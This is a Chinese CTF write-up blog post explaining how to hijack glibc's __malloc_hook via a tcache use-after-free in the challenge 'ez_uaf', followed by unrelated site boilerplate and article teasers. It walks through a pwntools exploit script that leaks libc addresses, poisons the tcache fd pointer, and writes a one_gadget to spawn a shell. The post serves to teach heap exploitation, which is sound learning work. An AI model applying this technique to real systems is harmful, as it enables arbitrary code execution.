pwn知识——劫持__malloc_hook(在加入tcache以后)

news/发布时间2024/5/18 16:47:08

导论

动调是最好的导师!

malloc_hook函数解析

malloc_hook是malloc的钩子函数,在执行malloc时,会先检测__malloc_hook的值,如果malloc_hook的值存在,则执行该地址(值里边表现为十六进制,可以成为地址),也就是说,如果我们成功劫持malloc_hook以后并修改它的值为one_gadget,我们就能getshell
并且在加入tcache之后,不会对大小进行检测,使我们更好利用它

利用范围

版本:Ubuntu18(加入了tcache,无需伪造size)--Ubuntu20.04
因为22.04删去了几乎所有的钩子函数,使得劫持hook成为了不可能,所以它的试用范围仅限于20.04之前,在未来应该会销声匿迹

它在学堆之后估计就是我们的老朋友的,我们常常能在堆题里看见并利用它,与free_hook和relloc_hook简直是三兄弟

利用思路

修改chunk->fd指向malloc_hook,然后把malloc_hook申请出来成为fake_chunk,再修改fake_chunk的值为one_gadget。修改完毕后记得校准one_gadget,有可能无法生效,毕竟可能不满足one_gadget的生效条件
光说fake_chunk可能会很懵,下面来看看实例罢

例题([HNCTF 2022 WEEK4]ez_uaf)

checksec

image
堆题是这样的,基本保护全开,但是不打紧

源审

image
经典菜单题

add

int add()
{__int64 v1; // rbxint i; // [rsp+0h] [rbp-20h]unsigned int v3; // [rsp+4h] [rbp-1Ch]for ( i = 0; i <= 15 && heaplist[i]; ++i );if ( i == 16 ){puts("Full!");return 0;}else{puts("Size:");v3 = getnum(); //sizeif ( v3 > 0x500 ){return puts("Invalid!");}else{heaplist[i] = malloc(0x20uLL); //堆列表,存放结构体if ( !heaplist[i] ){puts("Malloc Error!");exit(1);}v1 = heaplist[i];*(_QWORD *)(v1 + 16) = malloc((int)v3); //给content开辟v3大小,指向content,也就是说,这就是个conteng指针if ( !*(_QWORD *)(heaplist[i] + 16LL) ){puts("Malloc Error!");exit(1);}*(_DWORD *)(heaplist[i] + 24LL) = v3; //fd指针所在位置,位于struct+0x18的位置puts("Name: ");if ( !(unsigned int)read(0, (void *)heaplist[i], 0x10uLL) ) //struct的data域存0x10大小的name{puts("Something error!");exit(1);}puts("Content:");if ( !(unsigned int)read(0, *(void **)(heaplist[i] + 16LL), *(int *)(heaplist[i] + 24LL)) ){puts("Error!");exit(1);}*(_DWORD *)(heaplist[i] + 28LL) = 1; //不重要,就是个标识的占位符return puts("Done!");}}
}

可以看到会申请两个堆块,一个是struct结构体的大小,另一个是content的堆块,struct里有指向content的指针

delete

image
将add的两个堆块给free,但没有将指针置空,很明显的UAF漏洞

show

image
很正常的打印函数

edit

image
编辑content

思路

申请个0x400的堆块并free掉,使其进入unsorted bin,因为其中只有一个元素,指向自己,会泄露出main_arena(栈地址),在main_arena-0x10处是malloc_hook,接收main_arena后就可以泄露出malloc_hook和libc_base,就可以劫持malloc_hook了,接下来使malloc_hook成为fake_chunk后往里填one_gadget即可

动调过程

泄露libc和malloc_hook

def add(size,name,content):p.recvuntil(b'Choice:')p.sendline(b'1')p.recvuntil(b'Size:')p.sendline(str(size))p.recvuntil(b'Name:')p.send(name)p.recvuntil(b'Content:')p.send(content)def delete(idx):p.recvuntil(b'Choice:')p.sendline(b'2')p.recvuntil(b'idx:')p.sendline(str(idx))def show(idx):p.recvuntil(b'Choice:')p.sendline(b'3')p.recvuntil(b'idx:')p.sendline(str(idx))add(0x410,'Dusk','Falling')#0
add(0x20,'Dawn','Rising')#1
add(0x10 ,'Star','Shining')#2
gdb.attach(p)
delete(0) #free大堆块进入unsorted_bin(大于0x410的堆块即进入unsorted_bin)
show(0) #泄露main_arena + 96,进而获取malloc_hook和libc_basemain_arena = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 96
log.success('main_arena==>'+hex(main_arena))
malloc_hook = main_arena - 0x10
log.success('malloc_hook==>'+hex(malloc_hook))
libc_base = malloc_hook - libc.symbols['__malloc_hook']
log.success('libc_base==>'+hex(libc_base))
one_gadget = libc_base + 0x10a2fc
log.success('one_gadget==>'+hex(one_gadget))

free前
image
free后
image
可以看到unsorted_bin里已经指向main_arena了,将0堆块show了即可泄露栈地址

伪造fake_chunk和填one_gadget

delete(1)
edit(1,p64(malloc_hook))
add(0x10,'change','struct')  #3
add(0x20,'change','payload') #4
edit(4,p64(one_gadget))p.sendlineafter(b'Choice:',b'1')
p.sendlineafter(b'Size:',b'10')

经过两次free后,我们的堆是这样的
image
此时我们堆块1的content地址是0x55abadf3e720通过edit我们可以将它的fd指针修改为malloc_hook
edit前
image
edit后的链表和堆块1content的内容
image
我们可以看到,堆块1的content的fd指针已经被修改成了malloc_hook,成了实际size为0x20的fake_chunk,那么我们把它申请出来就好。
我们先申请堆块3,链表就变成了这样
image
至于为什么只申请出了一个堆块,是因为我们申请的content的大小只有0x10(显示0x21)字节
现在就是申请堆块4把malloc_hook变成fake_chunk。因为两个malloc都是申请size为0x20,刚好使content为fake_chunk,使我们的edit对它有写的权限
先看malloc_hook此时的值,里边的玩意估摸着是我add堆块4的时候弄进去的
image
OK,我们现在来edit它
image
image
和我们的one_gadget一样,我们只需再一次执行malloc就可以getshell了,注意多次调整one_gadget,满足其条件。因为我的本地环境和远端不一样所以没通,其实路子就是这样了

感言

我上网搜的时候感觉看的都是fast_bin的版本,没有怎么搜到tcache的,然后就自己摸索去了,并写出了此篇blog记录tcache的攻击方法。只能说,动调真的是学pwn最重要的东西,是最好的老师!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.ulsteruni.cn/article/01424605.html

如若内容造成侵权/违法违规/事实不符,请联系编程大学网进行投诉反馈email:xxxxxxxx@qq.com,一经查实,立即删除!

相关文章

4.21 团队作业——第二天

今天进行了晨会主要内容是进行了任务的时间管理分配,每个团队成员领取了任务,并且进行了任务的时间限制,燃尽图的书写概况

IEAD添加插件生成UML图

使用IDEA中生成UML(统一建模语言) 一、准备环境 在Ubuntu环境下进行配置使用,工具和插件在Windows环境下也有版本,需要的工具、插件都是相同的,同样安装配置即可。 。IDEA社区版:因为免费 。插件PlantUML Parser:生成".puml"文件 。GrapHviz:通过puml文件生成…

ubuntu无法进入桌面的一种情况

问题描述无法进入桌面 可以进入锁屏 输入密码后黑屏,并返回锁屏 tty能进入startx startx中部分软件无法打开 无法进入桌面最直接的错误,非常严重不可原谅。用户登陆输入密码,黑屏,然后回到用户登陆。后续操作使用tty3执行startx展现。 大量的.desktop无法打开 执行code竟然…

将彩色图转化为灰度图及其原理介绍

本文介绍了彩色图与灰度图,为什么要转化为灰度图,及其转化为灰度图的原理,包含加权平均法与简单平均法,在明白了原理之后,直接使用OpenCV中提供的函数进行图像灰度处理,希望对你有所帮助。彩色图介绍 彩色图像是一种包含颜色信息的图像,通常由红色、绿色和蓝色(RGB)三…

光学雨量计:高精度测量降水量的理想解决方案

光学雨量计:高精度测量降水量的理想解决方案 河北稳控科技光学雨量计是一种高精度测量降水量的理想解决方案。它利用光学原理,通过光束的衰减来测量降雨强度和累积降水量。相比传统的雨量计,光学雨量计具有更高的精度和可靠性,成为现代气象观测的重要工具。 传统的雨量计通…